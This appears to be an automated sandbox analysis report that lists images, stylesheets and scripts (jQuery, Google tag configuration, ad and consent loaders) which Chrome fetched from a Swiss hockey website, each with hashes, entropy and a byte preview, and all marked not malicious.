                                                                                                                                            Preview:RIFF....WEBPVP8X..............VP8 ........* ...>.D.J%..&.6.x...M.5.....Y.....%..E..?c......v..0../b~w.G*...o)..c.....v...<........S....q_._R...}.v...g.....x...?.z..h...-.A.....#.........\2.6....^...O....g............oj_....G....z..}...o...~..I.?.?n..}.......g..................._..........7.o...............?.......u....7...5....]M.U%.<J..AIYw.s...:.........m....Q..dg..\.#e....{e[R.X........`.7q.....?HqG..y4..X/..@..'..jEb.3..i....a^.2{].=!....rD.5...$K....wOJ$Y...\_..YG.E..."...W.%.%'..w..6.lb.E.......s...zt.H*....^.N87.V8.Y(..M.>.O....o..=.H..s.s .K..q..*/6'.G.......?$....odg{.9.C7..}...sT.7P.l&%b..W..S?.(...I...(^....d...YV8..QD.9....P...........t....r..9.....c.HE........fC..p.........9Y.3*.u}..j....~.L&.h9..>...;B'T.L[A.X.?>..p..n.P.Q.8.P..J..K...W...WL.Z.....B..k....".......I..a.|+.3.> .i..}S.s..tt.6...5I..4....<.T.....U.B..?.....U..3..z..f..n.(.7......C...n..lnLlk,....H^.LS\6.=.6.r.N..X&..7.........`n]"C....../...i.v\.Lv'z...."Gi..#9.p
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (5945)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):284046
                                                                                                                                            Entropy (8bit):5.585397257482029
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:C8619E7A32FED49A72A663041C00BE29
                                                                                                                                            SHA1:260A1F4B1D1BE99D0E14FB105D05A8DB0BC2F8F7
                                                                                                                                            SHA-256:4FBA72263C6004BA35C47E7C2FD9AF475E915CB12A2F6BBCE98FCBE1FEBB08D6
                                                                                                                                            SHA-512:10C080B13A7C5C384471AE6B077F69D487D28CA7AE59E4DEF32D3D90B6BE388A1B18D77FFAA07E2D773B6292834F2D16812B5935E001452864AF8B10287C5D34
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"2",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_ga_send","priority":8,"vtp_value":true,"tag_id":10},{"function":"__ogt_referral_exclusion","priority":8,"vtp_includeConditions":["list","phothockey\\.ch"],"tag_id":12},{"function":"__ogt_session_timeout","priority":8,"vtp_sessionMinutes":30,"vtp_sessionHours":0,"tag_id":13},{"function":"__ogt_1p_data_v2","priority":8,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTO
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):9990
                                                                                                                                            Entropy (8bit):7.949050131878001
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:6B41B0B342CC25A85A364843E6B096AE
                                                                                                                                            SHA1:5C6785A14CE6682828D602289A774DCCD61E1003
                                                                                                                                            SHA-256:020D9530BCD7D631B34F29E032BC1507793EBD9599098A303943CBBAA573FE15
                                                                                                                                            SHA-512:1421EDA591AB02FB433EE2CBD8F1EF951EADFBB3D9FDCB22F3D553E5B75FEE3166FE5046A6D97EDB8ECE32A6BDC6A9D27BE6D0FE90F9210AC792405C01734C10
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://ml3y3bxxlq19.i.optimole.com/w:auto/h:auto/q:mauto/ig:avif/https://phothockey.ch/wp-content/uploads/2020/09/ambri-piotta.png
                                                                                                                                            Preview:RIFF.&..WEBPVP8X..............ALPHS......m.9....O..CD...`;......m..Z..S5.H.Q......]..1.. .e'.X.m./GN>B..(._............N..N.C./.W.YF.:.2.a3....Yf.....R..=.df8...0.J..kvk.e6p.Yf.3..A%....Q.iX.(..Tr...0.0.a%........Z..0.T.._/7..d.g............K..............QQ.0...p.Z...66.3........T......WP;sT.).....*..qe..P.\WP.Q.Z.k...c..2...:.v&"&.3.....>l.P!....8.?..|p..%...;{..iS&O....~.3F...#m.}~..#.....3....l.j.}...7.u..d.$v...........J...5....;...>.Wp.._:.{..YY.d.H...zc....!Gv3u.s.fM..P.....46....Cn..uj..#.p..R._*S..]2...Q.g+W.*...I..N..e........g.r..jM.7.Q..:Q...z...1.....AS.......2.5.e..*...O..*P.#T...O.)..@..O$$5.|.."|=.F.F..B...]...\')G..o$.).....b.4*.\.HaF...Y.,.P...:......H=..2..S.G.&a..R...\...=).GW..L&..o...-L..KL.....Pm....'..o0.. .F..$.!.2I.ej...&....?3a.....'.&J.+E..v39\./..2!,g)... ..|..~..I..E~....Zu..e...Y.'...._.v\5.OR..6......m.\-..$..q.....:E..........*..&....)Ep.]yD~?.9.V.....C^*.\a.....JW.A..;>].s$...R....(...G.J9^.0~....(Y......U.+.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (13766)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):13805
                                                                                                                                            Entropy (8bit):4.575538245374783
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:75F79764F22D0FB2B0FE6E3999B19880
                                                                                                                                            SHA1:354D0569BEEC2319DA9F877367C7292E5C58B780
                                                                                                                                            SHA-256:DB78FE169706A9553790792CD6CF32DC41CA8BCA111CB3EB812604229A32E3FE
                                                                                                                                            SHA-512:278C07253477FF4D50AEEDCFE0B20A9F82CF2BAA9FE51FAA1087EE98082971723C3D7B2FF165C6AB72D4E88EF64331D7972B3E341FB26F3937B409F80B17D4CF
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://phothockey.ch/wp-content/plugins/elementor/assets/css/frontend-legacy.min.css?ver=3.5.6
                                                                                                                                            Preview:/*! elementor - v3.5.6 - 28-02-2022 */..elementor-bc-flex-widget .elementor-section-content-top>.elementor-container>.elementor-row>.elementor-column>.elementor-column-wrap{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-bc-flex-widget .elementor-section-content-middle>.elementor-container>.elementor-row>.elementor-column>.elementor-column-wrap{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-bc-flex-widget .elementor-section-content-bottom>.elementor-container>.elementor-row>.elementor-column>.elementor-column-wrap{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}.elementor-column-gap-narrow>.elementor-row>.elementor-column>.elementor-element-populated>.elementor-widget-wrap{padding:5px}.elementor-column-gap-default>.elementor-row>.elementor-column>.elementor-element-populated>.elementor-widget-wrap{padding:10px}.elementor-column-gap-extended>.elementor-row>.elementor-column>.elementor-element-populated>.elementor
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):2548
                                                                                                                                            Entropy (8bit):7.766078271308603
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:4BA1E87A177FE928C991A345EAD42681
                                                                                                                                            SHA1:55A28D033A713DF5F2B74436C6478E8C4766394C
                                                                                                                                            SHA-256:74940DADAAA82EE740EDC66D67B8E0F03F1946B7BF6041EB98EF1D0C4ACDE237
                                                                                                                                            SHA-512:4FD827347C217358923732BB07744051BBB9D74F5AF56D8ACE5DCCE812BCDD361D5F0D2E492ECB237086828C5833E9E0F4A301495E484204F764A781F9AD8EE7
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://ml3y3bxxlq19.i.optimole.com/w:130/h:90/q:mauto/rt:fill/g:ce/ig:avif/https://phothockey.ch/wp-content/uploads/2024/12/IMG_9535.jpg
                                                                                                                                            Preview:RIFF....WEBPVP8X...........Y..VP8 ....P'...*..Z.>.>.I.."&......@....#.s......%.....i............#.~....cX......7......g.....7.aQ^..}.Z..U....J......XYq..:9.q.H.=H....DW.....:H)j......70BS..,..r.}"....G.m./.."...G..]-....O.hO...#..N#q......>j..6.F.P-H....=~../..y....D..-O..Q..q.y.k.%I..}....z.a>h..I..X.|=.;...rK.......p.Z.R.y...@...)V..3V.A.>x.....g\.<..m..e..V*u....n.....U..3...2.d-(.z...tE+.g..}.....?..........0..............r?..>v)...{`...B.V..J...Q.|C3..p2m.6.'..v...#.~X\.......6Z2.V6..#. ..%.1@.U.?:.{.=q.[V(jSoy.9...68...!..L,AL.O..'."C..4mF../h...?..xV..._..$~.}.l+C.,.~.c.W....^..."....Px.....z.3...QnnpO..VHJ.v..S.!..H.j..nfF.Ic.........>E.rP@.."e`.t./......H..C.s..._...=S....9./.!.D.H..`m..^.......@..$...$...1....7..w4..8.^..s@G.d......*5.... ...{.Ym...A.2.>.../y:..8...3tv.5r...]M.;.....?a..mNr=.....$....5;...6X~`.v.8....7Q:.}+ vw..[.*..im...=.L..HN;.Vz.....w.?h.}."._..[.\"z4..>.^.ro...QD{x...0t...+....(..b.....h`...sI...~+C..N.[G
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (24121), with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):24121
                                                                                                                                            Entropy (8bit):5.415982924618744
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:E9E8A7DFECF3349D7C895B0F28A5A1F6
                                                                                                                                            SHA1:177E456A58AA112C1142E3D89CE559E332E73E20
                                                                                                                                            SHA-256:DA20B1080BF1033B6DE2DF962F97C077B53B3A14570EFB98E429DDEC7166ABBE
                                                                                                                                            SHA-512:28221F4C619A44B913D8597DAAE396A1C3345EDC1F7458BC06A32BBA9B6B4A4BBC7EF1411582D3922FB14173E0D779F77FCF4F25608CD4C2E20922DD5B758701
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:(()=>{var s={102:(t,i)=>{Object.defineProperty(i,"__esModule",{value:!0}),(i=i.CmpStatus||(i.CmpStatus={})).STUB="stub",i.LOADING="loading",i.LOADED="loaded",i.ERROR="error",i.VISIBLE="visible",i.HIDDEN="hidden",i.DISABLED="disabled"},848:(t,i)=>{Object.defineProperty(i,"__esModule",{value:!0}),(i=i.DisplayStatus||(i.DisplayStatus={})).VISIBLE="visible",i.HIDDEN="hidden",i.DISABLED="disabled"},778:(t,i)=>{Object.defineProperty(i,"__esModule",{value:!0}),(i=i.EventStatus||(i.EventStatus={})).TC_LOADED="tcloaded",i.CMP_UI_SHOWN="cmpuishown",i.USER_ACTION_COMPLETE="useractioncomplete"},483:(t,s,i)=>{function e(t){for(var i in t)s.hasOwnProperty(i)||(s[i]=t[i])}Object.defineProperty(s,"__esModule",{value:!0}),e(i(102)),e(i(848)),e(i(778))},189:(t,i,s)=>{s.d(i,{I1:()=>e,Uy:()=>n,Zv:()=>h,cm:()=>o});let e="dakt_2",h=["uuid","uuid_ts","session_id","version","component_id"];let n=180,o=18e5/864e5},837:(t,i,s)=>{s.d(i,{MO:()=>c,No:()=>r,Ri:()=>o,TV:()=>d,q4:()=>n});var e=s(189);let h=t=>{docume
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:PNG image data, 250 x 252, 8-bit colormap, interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):16402
                                                                                                                                            Entropy (8bit):7.965446216855369
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:11207C8DAB5C75DA7B6FFF01F2B6F8D1
                                                                                                                                            SHA1:CD76713825E04C892DA1EBB7547A1C4E0AD8033B
                                                                                                                                            SHA-256:6A5A6D915E4AB37808FFCDBF854FBC36B77323B8353684FC23C76130B048E74B
                                                                                                                                            SHA-512:BD3A17A374CAE20108A0B05E778C7B7B0ED11C3B18A4DB21002A42E64FB06D5AF178A6B4069E8F94EDC5610F16C21FC87B6A1EF82A978E8A248DAC4DDD0D44B0
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:.PNG........IHDR..............ly.....PLTE................................UUU..................zzz................................```...............;;;..................bbb..........................................iiiVVV.................................***ooo...]]]CCC:::............LLL]]]sssggg...................................................................................................5/*...)....!c]K.GPNC..........@@DDQJ...hJN%!.E=%....>$=7%.. gX...!qpt..!....odC.3$!..E.!P*+......92.Z. %.....u.#h,y.#VJ.0...n#^_b'./... l*....J'&%,O5;..;:@f 'm........ZY]....r`*..!FEKwe!+H/o^...\R6...cbf"u,wf.$.-1+....M....!1y8%{... ..._Q.(./5k9..!549jfdvnTeZZihl2U....<...+!....&&D;.,,2&8*GnMS.!...a=CPOSSOIyx|.m.n^"KJO8S>...! %......b(^49ZM&HC7eW(.U(...x6?%[-.>3...nb3UTY.# ...........}.+&.......b....;....ttRNS............."""'(,-/38:;;>?@BEEGJJLLPSTVWX[\\abiijjknorssvyz}......................................................m*_<....pHYs.................eXIfII*...........................
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 130x90, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3870
                                                                                                                                            Entropy (8bit):7.7515997029018875
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:C35A8E0F2BE218B7BAB9521920356A6E
                                                                                                                                            SHA1:DEC6FC98A79A0345537EE0B5EC63E1284E548E7D
                                                                                                                                            SHA-256:D248C9DE87AC23DC72CBEB00B2DA507BC76F617DD5E4F665BEB4F0A3B8E17904
                                                                                                                                            SHA-512:E8F52BC0C0DDF22F9C1A3858F6278589EF65D15DD86CEB10D6DA230E322656713E3286A1FB52A0E61E73866E166DE380817A3130F31205374F2A9290B1676AEF
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100................................Z..........C............................."......".$...$.6*&&*6>424>LDDL_Z_||....C............................."......".$...$.6*&&*6>424>LDDL_Z_||.......Z...."................................................................................3>~.....q.).......9....^...'...y..5...}#(.7.7+.Z..D.b...~L.....}g..V....}..-.-[@..,j.......X.gReX..4....w.Q,UY+#.7..lvTJf^.8\@..u....D.....yB..N2x.j.._.].}..&.......9S.d0.&Lp.....>7O~.?No....5[F....eV{Z............. .]...t..~..2.jy........l.K...<...-.............................!.A.#13. "%6Qa..........z.[...v.^.1.."...%6.j.~>.S...>.V3.W.(m0+W...W..!.q....e..N.Z.RQ..}JU:.x.v.M.hV.6;.Q.zT.S!.;h.D..'>.b.[g!m..m.`......J.|...]...;......yd..!.S.:B[.].......K....V.D.R.@[PB.2.m.C...:.aO..h.....w.K.u.+.......HB...K.r .\......k`...;..O..mO..j.0..B.meI.....Q..
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):12398
                                                                                                                                            Entropy (8bit):7.971166167588578
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:6B404B95AF38AD7294129E6D24AB7847
                                                                                                                                            SHA1:656D6706DB545987A9DEC68D1858979AEF17ACD9
                                                                                                                                            SHA-256:801B8E8519A2F55FF78293202EEB7274E6D93D6B846EC5A6D49E3258D45A011F
                                                                                                                                            SHA-512:B6FC17FE9271A98437E6AE39DE0D8C52BF63DDC4865C77242BCEB4F38E7930FB5523B47E7168FBBBCF55D84FAD91D753265DDF740BEF3DCA15DB4BBC7CFE44F1
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://ml3y3bxxlq19.i.optimole.com/w:392/h:272/q:mauto/rt:fill/g:ce/ig:avif/https://phothockey.ch/wp-content/uploads/2024/12/IMG_3968-1.jpg
                                                                                                                                            Preview:RIFFf0..WEBPVP8X..............VP8 ./..0....*....>.D.J%..)'r.1 ..em.0Y..0.\......[...l}.K..=)zGy..q.....O...'.{...>....?..'9.......H....?O....:~.y.z}..?.....}c?..E.W..L.H......../.....2XG....c..8.5J.n..|fj......x.#...m.-...{.eS.[;GV.*F.....-L(.H.bD'.......V.5..4..,...jW...h..;..o.....v.G.yJ-...A}.5...Z...7x-........@5c......'..w...g.....=..#G...vD|U.1........G;.L.......4nJ.e.1....J..jS......A-.b...-.M.T..e.C...H.Erw..>...x....h..N.._.........}..pA.ar..v....!..k....@..j........cwu...B?....0..!B..o.6..f=|.3...v.R..Z.Du ........s..`...&{.J.*.T:.*d..k.~.....`....P.....Mc..;....*k*$...m....L~..W).....j.7.\@0.C.X..5[tj:..?......!.&.)..q.Ch.g.....R....G.5..WLO.?..B...~.w....[...I}.R........-.b.6....H.2t..!.9.?..(.Q.\K!S.M?........Zd....1K..~.C7Kx._.g..G....!.......[.s.x.......7E....L.M.].h...eu....#.......>.z......P......0...O.M.#. ...l..^6B-...bdX].....$...uT.iK....d.cH..L...N.%.^.._..H.ok....,.3.>.!-#6.yV..ByvH;.>......S.Y...w.K...m....pns8e.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (65534), with no line terminators
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):81220
                                                                                                                                            Entropy (8bit):5.178027201348831
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:55076C35D88C6FDB87D274C033CC2FD1
                                                                                                                                            SHA1:9F869BE5D478670249DBB2DFDD9AD0ED348A8D47
                                                                                                                                            SHA-256:C7108E3F88710EB9C5B90B0DEFA31E913554222B847CF7EA2C0C8B5EB24001DC
                                                                                                                                            SHA-512:769728A3AE657B6849C50348DC4E996E3E4F2528D2C1BEF94840FF58642C5FE125453662CDC9A94A31A4F4122F358996CE92A31282A51D441713EC6D76A0BC81
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://master.gbads.io/prod/0.77.1/881.loader.js
                                                                                                                                            Preview:(self.webpackChunksloth_core=self.webpackChunksloth_core||[]).push([[881],{5313:(e,t,i)=>{"use strict";i.r(t),i.d(t,{TomSource:()=>s,TotmConfig:()=>n,default:()=>d});var s,n,r=i(6240),a=i(3715),o=i(356);!function(e){e.data="totm_data"}(s||(s={})),function(e){e.close="close",e.bannerDimension="bannerDimension",e.refresh="refresh"}(n||(n={}));class d extends a.default{constructor(e){super(!1,"AdConnector",{}),this.logger=new r.default("AdConnector"),this.registerMessageListener(),this.subscribeToEvents(),this.adUnit=e,this.connectorDataMap={[n.close]:this.closeAdUnit.bind(this),[n.bannerDimension]:this.adjustDimensions.bind(this),[n.refresh]:this.preventRefresh.bind(this)},this.ready.promise.then((()=>{this.logger.info({message:"AdConnector ready"}),this.registerMessageListener(),this.subscribeToEvents()}))}subscribeToEvents(){this.events.subscribe("adUnit.destroy",((e,t)=>{t===this.adUnit&&this.unregisterMessageListener()}))}registerMessageListener(){window.addEventListener("message",th
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (65447)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):87553
                                                                                                                                            Entropy (8bit):5.262620498676155
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:826EB77E86B02AB7724FE3D0141FF87C
                                                                                                                                            SHA1:79CD3587D565AFE290076A8D36C31C305A573D18
                                                                                                                                            SHA-256:CB6F2D32C49D1C2B25E9FFC9AAAFA3F83075346C01BCD4AE6EB187392A4292CF
                                                                                                                                            SHA-512:FC79FDB76763025DC39FAC045A215FF155EF2F492A0E9640079D6F089FA6218AF2B3AB7C6EAF636827DEE9294E6939A95AB24554E870C976679C25567AD6374C
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:/*! jQuery v3.7.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(ie,e){"use strict";var oe=[],r=Object.getPrototypeOf,ae=oe.slice,g=oe.flat?function(e){return oe.flat.call(e)}:function(e){return oe.concat.apply([],e)},s=oe.push,se=oe.indexOf,n={},i=n.toString,ue=n.hasOwnProperty,o=ue.toString,a=o.call(Object),le={},v=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},y=function(e){return null!=e&&e===e.window},C=ie.document,u={type:!0,src:!0,nonce:!0,noModule:!0};function m(e,t,n){var r,i,o=(n=n||C).createElement("script");if(o.text=e,t)for(r in u)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.remove
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 800x445, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):44448
                                                                                                                                            Entropy (8bit):7.9728295366421555
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:092E599119DBF92E0427F5DB5C724373
                                                                                                                                            SHA1:8E68271C3A1689D75F75D27F71DD4312432F98E9
                                                                                                                                            SHA-256:583953EF12A11411A861816AEA4D00DFC2BBFE08C250FE1CE7C7A09BCC6D6C56
                                                                                                                                            SHA-512:4544DAE8772945D11D5A7EA433B5BB64C7DDB8304214A51743818311A594B8142395E1DDBF26D329618D993FEA25717885B7B238AABB0BA213D6F10E9FBB1D47
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100.................... ......................C.............................0.#..#.0*3)')3*L;55;LWIEIWj__j.........C.............................0.#..#.0*3)')3*L;55;LWIEIWj__j.............. .."...................................................................................|......:wm....F..F.3.q............9L.=-..y]....7..N.q%.I.=..8s.Q.-.F.....=.K.[Q,Q...0nM.d..8..(.(..c.7.2.f...}>`{..s.7...[...-.D....Xc.......&c..^.'9s0l..#..~.z..L.Bb.=G..=9...a..j.{9.4.N...'"r0zTyblt.&?..i..........Wv.O7.*..J..O#{M.-r.1.B....dPP....d..x....s[..0.y..w...y.L.,..$......t-5oc..Q.7e$.c.@.Kn%x.#0..PF.$...R!j)..G.|..f.j.".V.H.\K..J....m3=.x..kQv..G.U7t...s.emA..>}....P.$..$.D.Fy...&..P...p.L,C.l._1.2.JL....9..EnQ.QZ...6.sZ..5YY.C6.3...r.......CKA.t,..ty..d.......F.].F....{..2.[%.*l9{.j.X.~s(.z..u.l..tesW.sI.=4......k+.P..s.W.T
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (52990)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):53044
                                                                                                                                            Entropy (8bit):5.438374620694402
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:0B6AA3AA07869D5163C8D489F7C66256
                                                                                                                                            SHA1:BD32C24DFC6C71AE54BF2E6473AD61FA6F81BE3B
                                                                                                                                            SHA-256:3D649C0B3E87FD6ABCB983656A0A1B3923A2A59885C3A30538641FD4F7126CBD
                                                                                                                                            SHA-512:D754CB423718F3BC335081D41A88386B58E2EB523635BD15773B43495064B52B0FBB9265DA8DD19E47A97CFAA1FABD40C73C36F9684F6C44F2A18E6502F44E88
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://acdn.adnxs.com/dmp/async_usersync.html
                                                                                                                                            Preview:<!DOCTYPE html>.<html>.<head>.</head>.<body>.<script type="text/javascript">!function(t){var e={};function a(n){if(e[n])return e[n].exports;var i=e[n]={i:n,l:!1,exports:{}};return t[n].call(i.exports,i,i.exports,a),i.l=!0,i.exports}a.m=t,a.c=e,a.d=function(t,e,n){a.o(t,e)||Object.defineProperty(t,e,{enumerable:!0,get:n})},a.r=function(t){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(t,"__esModule",{value:!0})},a.t=function(t,e){if(1&e&&(t=a(t)),8&e)return t;if(4&e&&"object"==typeof t&&t&&t.__esModule)return t;var n=Object.create(null);if(a.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:t}),2&e&&"string"!=typeof t)for(var i in t)a.d(n,i,function(e){return t[e]}.bind(null,i));return n},a.n=function(t){var e=t&&t.__esModule?function(){return t.default}:function(){return t};return a.d(e,"a",e),e},a.o=function(t,e){return Object.prototype.hasOwnProperty.call(t,e)},a.p="./",a(a.s=114)}({1:functi
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):4466
                                                                                                                                            Entropy (8bit):5.398535199359124
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:4F95A1EF393E117E35969A24E499FAB5
                                                                                                                                            SHA1:15B3A5CDC1EC23EA2DEFBA4272E69691CA8D4B23
                                                                                                                                            SHA-256:D95EF68ABA30EECF80756AE2645AF00669C14C2DEF73EB5D528A5F767E3392D0
                                                                                                                                            SHA-512:47F97C31A67D2D3D81596EC13C81D141DFA7B359763A8F63DCB6500B6A36ABAFE0F8D8F334436DFA0B1C6D1928CD313DF1C2E77E7CE6242F3B16D874D58C87C5
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://fonts.googleapis.com/css?family=Roboto%3A400%2C500
                                                                                                                                            Preview:/* cyrillic-ext */.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu72xKOzY.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu5mxKOzY.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* greek-ext */.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu7mxKOzY.woff2) format('woff2');. unicode-range: U+1F00-1FFF;.}./* greek */.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu4WxKOzY.woff2) format('woff2');. unicode-range: U+0370-0377
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 600x417, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):42612
                                                                                                                                            Entropy (8bit):7.97757559631044
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:79965E2ECEAF36BF4E0A5779BB2509E2
                                                                                                                                            SHA1:68532A83892D21C0725546A96E7CFEC4A9B9D334
                                                                                                                                            SHA-256:9B278E9461E625C0094BF6BE637FECF658C1CA94B735141C1F2DE5BDFC780228
                                                                                                                                            SHA-512:3E4D7BCAC74B3176BF0FCD70BA97F9EB792122874399DC05044BE1214A5361EAB569A5E87F616D10B91CB7E1CE36A562AF41CBB936799B4944C05764023B6A47
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
